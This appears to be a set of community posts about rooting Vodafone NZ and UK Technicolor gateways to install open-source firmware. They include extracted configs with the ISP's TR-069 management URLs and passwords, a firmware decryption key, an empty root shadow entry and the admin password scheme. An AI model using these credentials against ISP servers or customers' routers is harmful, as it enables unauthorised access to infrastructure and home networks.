• Uploaded to firmware/

URL Info

• ISP's url - public
• ISP's url - private
• My own cloud sharing
  Type: http

Can be found here: https://drive.google.com/drive/folders/18xeza1uGHs5SHsBtBL_D5eS7ANsCu1an?usp=sharing

Device Info

Mnemonic: VCNT-A

Model Number: DJA0231

Vendor Code: TLS

Hi,

I have two vant-9 Technicolor 500-T Vodafone-DGA0130VDF-NZ boxes here I'm trying to unlock.
They run a custom firmware which I've been able to reverse engineer but not get code execution on
It runs an ssh server behind iptables. I've attached some of the firmware. Any help getting code execution here would be awesome to root these boxes get something open source running on them.

I've uploaded the extracted firmware + bins here:

 https://mega.nz/#F!kc9wHQhD!hN48b47_1o6NYixBML76xA

Heres some more info I've gathered on the device I'd be keen to try anything to get this unlocked
I'd be really keen to try any ideas that anyone may have. We have a heap of these in our country going to waste and it would be awesome to be able to save them from going in the trash

does anyone know if their is a way to get code execution on this device so I can build custom firmware on it

Cheers,
Henry

other firmware versions? CRF716 CRF725 
http://downloads.vodafone.co.nz/ultrahub_crf731.rbi 

Firmware-Version:           17.1.7875-2461002-CRF731
Productname:                  Vodafone Ultra Hub

    Dual Core Broadcom 400MHz CPU with 256MB DDR3 RAM
    DSL/WAN router
    1x ADSL/VDSL (RJ-11)
    3 x Gigabit Ethernet LAN (RJ45)
    1 x Gigabit Ethernet WAN (RJ45)
    2 x FXS for analogue phones, fax, pos (RJ11)
    1 x USB 2.0
    4G/3G HSPA via MBB USB stick
    VodafoneTV support
    Wi-Fi 11b/g/n/ac dual band concurrent: 5GHz Quantenna 4x4  MIMO and beam forming.  2,4GHz Broadcom 2x2
    DSL chipset - Bcm6303

: busybox [function [arguments]...]
   or: busybox --list
   or: function [arguments]...

        BusyBox is a multi-call binary that combines many common Unix
        utilities into a single executable.  Most people will create a
        link to busybox for each function they wish to use and BusyBox
        will act like whatever it was invoked as.

Currently defined functions:
        [, [[, addgroup, arping, ash, awk, base64, basename, bunzip2, bzcat, cat, chgrp, chmod, chown, chpasswd,
        chroot, chrt, clear, cmp, cp, crond, crontab, cut, date, dd, df, dhcprelay, dirname, dmesg, du, echo, egrep,
        env, expr, false, fdisk, fgrep, find, free, fsync, grep, gunzip, gzip, halt, head, hexdump, hostid, hwclock,
        id, ifconfig, insmod, kill, killall, less, ln, lock, logger, login, ls, lsmod, lsusb, md5sum, mkdir, mkfifo,
        mknod, mktemp, mount, mpstat, mv, nc, netmsg, netstat, nice, nslookup, ntpd, passwd, pgrep, pidof, ping, ping6,
        pivot_root, poweroff, printf, ps, pwd, readlink, reboot, reset, rm, rmdir, rmmod, route, sed, seq, sh,
        sha256sum, sleep, sort, start-stop-daemon, strings, switch_root, sync, sysctl, tail, tar, taskset, tee, telnet,
        test, time, timeout, top, touch, tr, traceroute, traceroute6, true, udhcpd, umount, uname, uniq, uptime,
        vconfig, vi, wc, wget, which, xargs, yes, zcat

OSCK Key: 89BCC09EABE21FA738E62E6D911FA80CAF091233ECCFF88442FAA5D7AF651A30
Encrypted data starts at 0x170
Detected board name: VANT-9
Known as: DGA0130

BoardName: VANT-9
Prodname: MediaAccess TG789Bvac
varname: TG789Bvac

/etc/shadow
root::0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
mosquitto:x:0:0:99999:7:::

/etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
mosquitto:x:200:200:mosquitto:/var/run/mosquitto:/bin/false

# usr_admin (`Admin`) takes password based on gateway model
# The password Vodafone specifies is their commercial product name `VFH500-t`, prefixed with `VF-NZ`.
# At time of creation, Technicolor's VANT-9 is the only Vodafone board,
# hence this file is installed from that board-specific folder.
# If more Vodafone products are to be created, more customization may be needed.
# _set_salt_verifier "usr_admin" "VF-NZVFH500-t"

it said something about a management IP vlan? on eth4 (sfp) 8021q which allows access to ssh etc
192.168.10.2 255.255.255.0
192.168.2.2 255.255.255.0

#/*******************************************************************/
#/*               Vodafone specific rules ACCEPT                    */
#/*******************************************************************/
config ipset  'trusted_network'
	option external          'trusted_network'
	option storage           'hash'
	option match             'src_ip'

# Allow SSH
config rule 'Allow_SSH_Vodafone_wan'
	option name              'Allow-SSH-Vodafone-wan'
	option src               'wan'
	option proto             'tcp'
	option family            'ipv4'
	option dest_port         '22'
	option ipset             'trusted_network'
	option target            'DROP'

# Allow IPv4 ping from trusted networks
config rule 'Allow_Ping_Vodafone_wan_Trusted'
	option name              'Allow-Ping-Vodafone-wan-Trusted'
	option src               'wan'
	option proto             'icmp'
	option icmp_type         'echo-request'
	option family            'ipv4'
	option ipset             'trusted_network'
	option target            'ACCEPT'

# Allow IPv4 ping from all networks
config rule 'Allow_Ping_Vodafone_wan'
	option name              'Allow-Ping-Vodafone-wan'
	option src               'wan'
	option proto             'icmp'
	option icmp_type         'echo-request'
	option family            'ipv4'
	option target            'ACCEPT'
	option enabled           '0'

config rule 'Allow_Ping6_Vodafone_wan'
	option name              'Allow-Ping6'
	option src               'wan'
	option proto             'icmp'
	option icmp_type         'echo-request'
	option family            'ipv6'
	option target            'ACCEPT'
	option enabled           '0'

# Block HTTPS from LAN
config rule 'Block_HTTPS_Vodafone_lan'
	option name              'Block-HTTPS-Vodafone-lan'
	option src               'lan'
	option proto             'tcp'
	option dest_port         '443'
	option target            'ACCEPT'

# Allow SSH from LAN
config rule 'Allow_SSH_Vodafone_lan'
    option src                   'lan'
    option name                  'Allow-SSH-Vodafone-lan'
    option dest_port             '22'
    option target                'ACCEPT'

# Allow HTTP from LAN
config rule 'Allow_HTTP_Vodafone_lan'
    option src                   'lan'
    option name                  'Allow-HTTP-Vodafone-lan'
    option dest_port             '80'
    option target                'ACCEPT'

# Allow IPv4 ping from LAN
config rule 'Allow_Ping_Vodafone_lan'
    option src                   'lan'
    option name                  'Allow-Ping-Vodafone-lan'
    option proto                 'icmp'
    option target                'ACCEPT'

config include 'tod'
	option type		 'script'
	option path		 '/lib/functions/tod.sh'
	option reload		 '1'

config include 'intercept'
	option type		 'script'
	option path		 '/usr/lib/intercept/firewall.sh'

config include 'remote'
	option type	         'script'
	option path	         '/lib/functions/firewall-remoteaccess.sh'
	option reload	         '1'


config ipset 'trusted_network'
	option storage 'hash'
	list match 'src_ip'
	option enabled '1'
	option family 'ipv4'



config ipset_entry 'trusted_networkentry1'
	option ip '202.73.206.161'
	option ipset 'trusted_network'

config ipset_entry 'trusted_networkentry2'
	option ip '202.73.198.161'
	option ipset 'trusted_network'

config ipset_entry 'trusted_networkentry3'
	option ip '116.89.224.160'
	option ipset 'trusted_network'

config ipset_entry 'trusted_networkentry4'
	option ip '203.144.40.160'
	option ipset 'trusted_network'

config rule
        option target 'management_udp'
        option proto  'udp'
        option destports '53,67,68,500,4500'
        option priority '1'
config rule
        option target 'cwmpd'
        option destports '7547,51007'


  _______              __           __              __             
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|  
                 N E X T   G E N E R A T I O N   G A T E W A Y
 --------------------------------------------------------------------
 NG GATEWAY SIGNATURE DRINK
 --------------------------------------------------------------------
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
 --------------------------------------------------------------------

Product: vant-9_vodafone
Release: Gold (17.1)
Version: 17.1.7988-2461029-20181022011356-cc42b789f8a7d5942c548fddfea7d5a7c0aabb4d


Hash config:         cc42b789f8a7d5942c548fddfea7d5a7c0aabb4d
Hash openwrt:        0b18280c71b895607da3be171d9364fac8cffda2
Hash kernel:         cccbe44b4b3c45eea532b78301202ed0e12c7ae4
Hash packages:       cb0b3da905a60ee9820e422ccb4b077bc11c03f3
Hash technicolor:    0fa80d604e8c6c4964c42b8734b0a0b6d74f0bfc
Hash routing:        2dc9f5ceb468d8f9bcbcb7ac0ab7719ba4e7a876
Hash lte:            63fad0a763f5b26af14fe6df7fbfe725d92574ce
Hash mindspeed:      cd5df6841bf54c8c1d7e716ce22d0afa2fef66e5
Hash custo:          47fa351dff41330b200cabf2d5d4063b24a5b1ac

RBI Firmware info
        option company_name 'Technicolor'
        option prod_friendly_name 'Vodafone-DGA0130VDF-NZ'
        option prod_name 'MediaAccess'
        option prod_number 'Vodafone-DGA0130VDF-NZ'
        option ssid_prefix 'vodafone'
        option CPE_MODEL 'DGA0130VDF-NZ'
        option provisioning_code 'VFNZ'
        option CONF_VERSION 'CRF897'
		option vodafone_variant 'NZ'

config settings 'tr69clientconfiguration'
	option inform '1'
	option inform_interval '3600'
	option acs_url http://xvfnzhdmw.xdev.motive.com/cwmpWeb/CPEMgt
	option acs_username 'vfnz_hdm'
	option acs_password 'VF-dkpeh43f-t'
	option connection_req_username 'vfnz_hdm'
	option connection_req_password 'VF-dkpeh43f-t'

/etc/cwmpd
	option acs_url https://pvfnzhdmw.vfnz.motive.com/cwmpWeb/WGCPEMgt
	option periodicinform_interval 3600
	option acs_user "vfnz_hdm"
	option acs_pass "dkpeh43f"
	option state 1
	option upgradesmanaged '1'
	option interface 'wan'
	option connectionrequest_auth '1'
	option connectionrequest_allowedips '199.117.180.0/24,207.71.32.0/24,216.61.48.0/24,64.186.176.0/24,64.186.180.0/24,64.186.183.0/24,64.186.187.0/24,64.186.188.0/24,64.186.189.0/24,64.186.191.0/24'
	option upgrade_rollback_timeout 300
	option connectionrequest_port 51005
	option ssl_castore '/etc/ssl/certs/'
	option ssl_verifypeer '1'
	option ssl_hostnamecheck '1'
	option use_dhcp '0'
	option enforce_https '1'
	option backoff_minwait '5'
	option backoff_multiplier '2000'
	option periodicinform_enable '1'

/etc/snmpd
config system
	option sysLocation	'office'
	option sysContact	'[email protected]'
	option sysName		'HeartOfGold'
#	option sysServices	72
#	option sysDescr		'adult playground'
#	option sysObjectID	'1.2.3.4'

config 'values' 'config'
	option base_url 'https://vodafone:[email protected]:8443/'
	option core_url 'https://vodafone-core.tgwfd.org:5443/'
	option fifo_dir '/tmp/gwfd'
	option flush_size '30'
	option flush_interval '900'
	option enable '0'
	option tag 'VodafoneFT'

http://192.168.1.1:5000/rootDesc.xml

PORT     STATE SERVICE
1900/udp open  upnp
| upnp-info: 
| 192.168.1.1
|     Server: OpenWRT/OpenWrt/Attitude_Adjustment__r43446_ UPnP/1.1 MiniUPnPd/1.8
|_    Location: http://192.168.1.1:5000/rootDesc.xml

hello there ,
i use the Technicolor Dga2231,
i change the internet provider and want to change the Telephone setting (Sip) ,
i cant find how to configure that ...
can someone help with it?
thank you 👍

Custom GUI section.

Gateways have been bricked installing this firmware so risk should be explained.

Hi, when I try to download vbnt-l_16.3.7190-2761005-bank_dump.xz I get a quota exceeded error - is it possible to host this somewhere else?

I'm happy to continue looking at rooting these VANT-2 boards, and I'll capture findings in this Issue.

I have one gateway running the following firmware (ISP to be determined):
Version: 16.2.7064-2201007-20170207201543-d592e891575d5fd3ba62668fd85dd2574bca7b1e

I have one gateway running the following firmware (again, ISP to be determined):
Version: 16.2.7064-2201001-20160818135750-d592e891575d5fd3ba62668fd85dd2574bca7b1e

• Product: TG588v v2
• ISP: Various
• Countries: UK
• Commercial name from the ISP: Unknown
• Board: VANT-2

I am not aware of anyone having rooted VANT-2 boards previously. I obtained the OSCK (now added to Decrypt_RBI_Firmware_Utility) by removing the flash chip and reading out the contents. I have tried strategies #A #D and #E for rooting, but have not yet identified the reason that these fail.

Firmware versions (further details to be added by myself soon):

• Version: 15.53.6970

  • Full version: 15.53.6970-1341001-? (look into RBI for it if needed)
  • Custom firmware version strings used by ISP in addition to the above: None
  • ISP: unknown
  • RBI file name: "MST TG588v v2 15.53.6970-1341001.rbi"
  • RBI official download URL: Not known
  • Other RBI download links for us to look into it: in repo
  • Raw bank dump download link: Not needed, RBI+OSCK available
  • Serial console bootlog: (From another VANT-2 board with different firmware) https://pastebin.com/w86NUkqy

• Version: 16.2.7064

  • Full version: 16.2.7064-2201001-20160818135750-d592e891575d5fd3ba62668fd85dd2574bca7b1e
  • Custom firmware version strings used by ISP in addition to the above: None
  • ISP: unknown -- references "surfdsluk", possibly indicating Digital Wholesale Solutions / Daisy Communications
  • RBI file name: "MST TG588v v2 16.2.7064.2201001.rbi"
  • RBI official download URL: Not known
  • Other RBI download links for us to look into it: in repo
  • Raw bank dump download link: Not needed, RBI+OSCK available
  • Serial console bootlog: (From another VANT-2 board with different firmware) https://pastebin.com/w86NUkqy

• Version: 16.2.7064

  • Full version: 16.2.7064-2201007-20170207201543-d592e891575d5fd3ba62668fd85dd2574bca7b1e
  • Custom firmware version strings used by ISP in addition to the above: Version Jade (16.2)
  • ISP: bOnline: https://www.bonline.com/
  • RBI file name: Not known
  • RBI official download URL: Not known
  • Other RBI download links for us to look into it: Not available
  • Raw bank dump download link: in raw dump repo hack-technicolor/tch-bank-dumps
  • Serial console bootlog: (From another VANT-2 board with different firmware) https://pastebin.com/w86NUkqy